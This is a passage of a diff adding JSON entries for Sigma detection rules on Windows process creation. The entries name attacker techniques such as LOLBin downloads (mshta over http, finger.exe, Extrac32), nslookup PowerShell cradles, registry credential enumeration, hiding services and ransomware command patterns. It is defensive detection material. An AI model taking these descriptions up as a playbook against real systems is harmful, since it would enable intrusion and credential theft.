+ "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "value": "Python Spawning Pretty TTY on Windows" + }, + { + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "meta": { + "author": "frack113", + "creation_date": "2022/03/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_replace.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", + "value": "Replace.exe Usage" + }, + { + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/08", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "filename": "proc_creation_win_susp_mounted_share_deletion.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "value": "Mounted Share Deleted" + }, + { + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "meta": { + "author": "A. Sungurov , oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" + ], + "filename": "proc_creation_win_lolbin_pcwrun.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", + "https://twitter.com/pabraeken/status/991335019833708544", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "value": "Indirect Command Execution By Program Compatibility Wizard" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "value": "Invoke-Obfuscation Via Stdin" + }, + { + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "value": "Suspicious aspnet_compiler.exe Execution" + }, + { + "description": "Detects different loaders as described in various threat reports on Lazarus group activity", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2020/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_lazarus_loader.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", + "value": "Lazarus Loaders" + }, + { + "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_adfind_enumeration.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", + "https://www.joeware.net/freetools/tools/adfind/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "value": "Suspicious AdFind Enumeration" + }, + { + "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redirect_local_admin_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" + ], + "tags": "No established tags" + }, + "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", + "value": "Suspicious Redirection to Local Admin Share" + }, + { + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_script_event_consumer_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + "value": "Script Event Consumer Spawning Process" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_group_recon.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", + "value": "Suspicious Get Local Groups Information with WMIC" + }, + { + "description": "An adversary might use WMI to execute commands on a remote system", + "meta": { + "author": "frack113", + "creation_date": "2022/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remote_command.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", + "value": "WMI Remote Command Execution" + }, + { + "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", + "meta": { + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "creation_date": "2022/05/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_jlaive_batch_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/ch2sh/Jlaive", + "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "value": "Jlaive Usage For Assembly Execution In-Memory" + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "WSL (Windows Sub System For Linux)", + "Other currently unknown software" + ], + "filename": "proc_creation_win_mstsc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "value": "Remote Desktop Protocol Use Mstsc" + }, + { + "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_csexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://github.com/malcomvetter/CSExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "value": "CsExec Remote Execution Tool Usage" + }, + { + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "meta": { + "author": "Eli Salem, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_regini_ads.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "value": "Modifies the Registry From a ADS" + }, + { + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_type.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_type.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "value": "Potential Download/Upload Activity Using Type Command" + }, + { + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mshta_http.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" + ] + }, + "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", + "value": "Mshta Remotely Hosted HTA File Execution" + }, + { + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/20", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "value": "Abuse of Service Permissions to Hide Services in Tools" + }, + { + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", + "value": "Enumeration for 3rd Party Creds From CLI" + }, + { + "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_commandline_chars.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" + ], + "tags": "No established tags" + }, + "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", + "value": "Suspicious Characters in CommandLine" + }, + { + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "meta": { + "author": "Florian Roth, Tigzy", + "creation_date": "2021/11/17", + "falsepositive": [ + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + ], + "filename": "proc_creation_win_susp_winrar_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1460978167628406785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", + "value": "Winrar Execution in Non-Standard Folder" + }, + { + "description": "Download or Copy file with Extrac32", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extrac32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", + "value": "Suspicious Extrac32 Execution" + }, + { + "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_outlook.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/sensepost/ruler", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.t1202" + ] + }, + "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", + "value": "Suspicious Execution from Outlook" + }, + { + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/06/19", + "falsepositive": [ + "Unknown, maybe some security software installer disables these features temporarily" + ], + "filename": "proc_creation_win_susp_disable_ie_features.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "value": "Disabled IE Security Features" + }, + { + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_nslookup_poweshell_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "value": "Nslookup PowerShell Download Cradle - ProcessCreation" + }, + { + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malicious_cmdlets.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://adsecurity.org/?p=2921", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/calebstewart/CVE-2021-1675", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" + ] + }, + "uuid": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "value": "Malicious PowerShell Commandlets - ProcessCreation" + }, + { + "description": "Detects suspicious command line to remove and 'exe' or 'dll'", + "meta": { + "author": "frack113", + "creation_date": "2021/12/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_del.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "204b17ae-4007-471b-917b-b917b315c5db", + "value": "Suspicious Del in CommandLine" + }, + { + "description": "This command line patterns found in BlackByte Ransomware operations", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ransom_blackbyte.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" + ], + "tags": "No established tags" + }, + "uuid": "999e8307-a775-4d5f-addc-4855632335be", + "value": "BlackByte Ransomware Patterns" + }, + { + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_false_sysinternalsuite.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "value": "Potential Binary Impersonating Sysinternals Tools" + }, + { + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" + ], + "tags": "No established tags" + }, + "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "value": "Suspicious Windows Update Agent Empty Cmdline" + }, + { + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_calc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ItsReallyNick/status/1094080242686312448", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "value": "Suspicious Calculator Usage" + }, + { + "description": "Detects the execution of a renamed office binaries", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_office_processes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://infosec.exchange/@sbousseaden/109542254124022664", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "value": "Renamed Office Binary Execution" + }, + { + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "meta": { + "author": "Florian Roth, omkar72, oscd.community", + "creation_date": "2021/02/24", + "falsepositive": [ + "Admin activity (unclear what they do nowadays with finger.exe)" + ], + "filename": "proc_creation_win_susp_finger_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", + "value": "Finger.exe Suspicious Invocation" + }, + { + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", + "https://twitter.com/mrd0x/status/1465058133303246867", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", + "value": "MpiExec Lolbin" + }, + { + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_systeminfo.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "value": "Suspicious Execution of Systeminfo" + }, + { + "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190", + "meta": { + "author": "GossiTheDog (rule), frack113 (sigma version)", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "filename": "proc_creation_win_msdt_diagcab.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", + "value": "Execute MSDT.EXE Using Diagcab File" + }, + { + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th postiional argument", + "meta": { + "author": 